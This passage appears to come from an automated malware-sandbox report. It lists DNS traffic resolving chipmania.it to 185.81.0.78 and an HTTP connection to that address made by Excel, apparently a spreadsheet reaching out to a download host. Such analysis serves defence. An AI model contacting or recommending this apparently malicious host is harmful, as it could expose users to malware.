Feb 20, 2021 03:17:03.494488001 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:03.552203894 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:17:15.065036058 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:15.127029896 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 03:17:15.140758991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 03:17:15.201056957 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 03:17:03.494488001 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 03:17:03.552203894 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 03:17:03.634332895 CET | 0 | OUT | |
Feb 20, 2021 03:17:03.699875116 CET | 2 | IN |